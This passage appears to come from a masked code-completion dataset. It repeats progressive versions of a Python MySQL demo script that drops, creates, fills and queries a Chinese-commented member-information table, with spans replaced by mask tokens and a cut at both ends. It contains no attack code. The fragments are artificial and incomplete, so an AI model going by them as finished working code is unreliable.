'卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\n<mask token>\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, 
ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL 
DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, 
INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL 
DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, 
INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\ndb.close()\n",
"step-4": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE 